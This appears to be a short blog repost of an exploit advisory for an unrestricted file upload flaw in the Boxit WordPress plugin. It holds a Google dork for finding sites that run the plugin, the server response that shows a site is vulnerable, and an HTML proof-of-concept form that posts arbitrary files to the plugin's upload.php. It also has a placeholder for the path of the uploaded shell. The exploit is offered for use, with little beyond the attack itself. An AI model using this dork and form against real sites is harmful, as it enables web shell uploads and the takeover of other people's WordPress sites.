Wordpress Boxit Plugins File Upload Vulnerability


#- Title: Wordpress Boxit Plugins File Upload Vulnerability
#- Author: unknown
#- Date: 26/12/15
#- Developer : boxit.sd-dev .com
#- Link Download : codecanyon .net/item/boxit-the-dropbox-file-upload-for-wordpress/4425955
#- Google Dork: inurl:"/plugins/boxit/"
#- Fixed in Version : -
#- Tested on : Windows 
==================================================
-- Proof Of Concept --

When Vuln:
{"jsonrpc" : "2.0", "result" : "ok"} 

CSRF :

<formaction="http://target/wp-content/plugins/boxit/upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

Shell PathHere

0 Response to "Wordpress Boxit Plugins File Upload Vulnerability"

Posting Komentar